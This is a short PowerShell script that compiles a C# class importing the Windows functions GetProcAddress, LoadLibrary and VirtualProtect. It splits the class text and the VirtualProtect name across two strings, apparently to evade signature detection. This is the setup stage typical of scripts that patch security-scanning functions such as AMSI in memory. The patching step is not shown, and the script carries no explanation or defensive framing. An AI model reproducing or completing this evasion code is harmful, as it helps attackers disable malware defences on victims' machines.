$test = Add-Type
$7amada = [System.Runtime.InteropServices.Marshal]
$ahh = @"
using System;
using System.Runtime.InteropServices;
public class afrcv {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool Virtual
"@


$hh = @"
Protect(IntPtr lpAddress, UIntPtr odwsuy, uint flNewProtect, out uint lpflOldProtect);
}
"@

$afrcv = $ahh+$hh

$test -TypeDefinition $afrcv
